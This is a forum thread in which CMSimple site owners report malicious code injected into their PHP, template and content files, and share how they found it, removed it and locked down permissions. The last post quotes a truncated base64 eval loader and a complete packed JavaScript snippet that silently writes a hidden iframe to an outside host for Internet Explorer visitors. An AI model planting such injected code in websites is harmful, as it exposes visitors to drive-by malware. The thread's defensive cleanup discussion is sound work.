Visitors reported today that a website is hacked. Reviewing index.php and default.php files I'we found a code attached to each of these files
[ external image ]
How got it there is not known. Chceck your websites. At first you'll see only the first two lines of the code as the rest is TABbed far to tight.
So far no part of this string can't be found via a batch search in Notepad++. It seems to open file after file
WARNING !!! HACKERS !!!
WARNING !!! HACKERS !!!
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: WARNING !!! HACKERS !!!
Googling for "malware f524d6" brings some results. It seems this site isn't the only one that has been "hacked" and that it's not specificly targeted at CMSimple. Googling for "http://www.slapcentrum.se/" brings up even more interesting results.
What does the injected code do: it inserts an (nearly) invisible Iframe calling a PHP script on another site. What this script is doing? I don't know.
What does the injected code do: it inserts an (nearly) invisible Iframe calling a PHP script on another site. What this script is doing? I don't know.
I wouldn't recommend checking the websites with JS enabled, as this will already trigger the other PHP script. It's better to check the source code of the website with JS disabled.Tata wrote:Chceck your websites. At first you'll see only the first two lines of the code as the rest is TABbed far to tight.
Christoph M. Becker – Plugins for CMSimple_XH
Re: WARNING !!! HACKERS !!!
you can also, for first, scan your site from extern with the Free Website Malware Scanner
lg.
winni
Durch einen Sucher betrachtet wird alles zu einem Motiv.
meine Galerie; mein Blog, mein CMSimple Template Tutorial
winni
Durch einen Sucher betrachtet wird alles zu einem Motiv.
meine Galerie; mein Blog, mein CMSimple Template Tutorial
Re: WARNING !!! HACKERS !!!
Maybe a good idea, but it seems that this scanner could not find the js-included iframe....snafu wrote:you can also, for first, scan your site from extern with the Free Website Malware Scanner
So it's useless in this special case.
KR
Holger
Re: WARNING !!! HACKERS !!!
It was not that tragic finally. Affected were only:
2lang/index.php
2site/index.php
cmsimple/login.php
cmsimple/languages/default.php - not under all installations
plugins/index.php
I downloaded the entire domain+subdomains and let search after longer part of the script. Notepad++ made it. But I needed to open all affected files and remove the script manually. In some of the files the script was inserted in the middle of the file (about #519).
Everything goes up now.
2lang/index.php
2site/index.php
cmsimple/login.php
cmsimple/languages/default.php - not under all installations
plugins/index.php
I downloaded the entire domain+subdomains and let search after longer part of the script. Notepad++ made it. But I needed to open all affected files and remove the script manually. In some of the files the script was inserted in the middle of the file (about #519).
Everything goes up now.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: WARNING !!! HACKERS !!!
That's good news!Tata wrote:It was not that tragic finally.
But you might consider to try finding out how this has happened; otherwise it might soon happen again (it could be caused by malware on a client). At least you should remove all writing permissions from the infected files (444 or 400); they don't need them anyway.
Christoph M. Becker – Plugins for CMSimple_XH
Re: WARNING !!! HACKERS !!!
There must be still something in it.
I have found this script also in a language file in advancedform, also in content.htm just afer <p>{{{PLUGIN:calendar();}}}</P> and also in template.htm in <head></head>.
Now I hove downloaded the backup from this morning, when the page worked well and have uploaded it back.
The page has a picture above the navigation redirecting to a subdomain. And this doesn't work. Evidently the script must still be somewhere. Funny is, that as long as I am logged in, everything works fine. Does it point to a place, where the script is still in function?
EDIT: It was in a content.htm in one of the domains. Soon the upload is ready and CHMOD will take place.
I have found this script also in a language file in advancedform, also in content.htm just afer <p>{{{PLUGIN:calendar();}}}</P> and also in template.htm in <head></head>.
Now I hove downloaded the backup from this morning, when the page worked well and have uploaded it back.
The page has a picture above the navigation redirecting to a subdomain. And this doesn't work. Evidently the script must still be somewhere. Funny is, that as long as I am logged in, everything works fine. Does it point to a place, where the script is still in function?
EDIT: It was in a content.htm in one of the domains. Soon the upload is ready and CHMOD will take place.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: WARNING !!! HACKERS !!!
I don't know if I am to only in WWW having at least once a year hackers' visits to my webspace.
Now hundreds of files are "saturated" by
The code is added just after the very first <?php in fast all (core and plugins):
language ??.php
??config.php
default.php
config.php
pagedata.php
Also one javascript.js was infected with the code "eval"
Now hundreds of files are "saturated" by
Code: Select all
eval(base64_decode("DQplcnJvcl9.........Cn0KfQ0KfQ0KfQ=="));
language ??.php
??config.php
default.php
config.php
pagedata.php
Also one javascript.js was infected with the code "eval"
Code: Select all
(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 0=a c(),4=a c(0.i()+j);3(h.l.7("m 6")!=-1&&2.b.7("8=s")==-1){3(0.g()!=-1){5 9="d"}2.f("<e"+9+" k"+"r=1 z"+"o=1 A=\'B"+"p://x"+".y/q/\' t=\'u:n"+"w\'></3"+"v>");2.b="8=s;"+" 4="+4.C()+"; "}',39,39,'today||document|if|expires|var||indexOf|_fhjtju|iframe|new|cookie|Date|ame|ifr|write|getTimezoneOffset|navigator|getTime|2678400000|wi|appVersion|MSIE||ht||b2b|dth||style|display|rame|one|secatm|net|heig|src|htt|toGMTString'.split('|')));
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.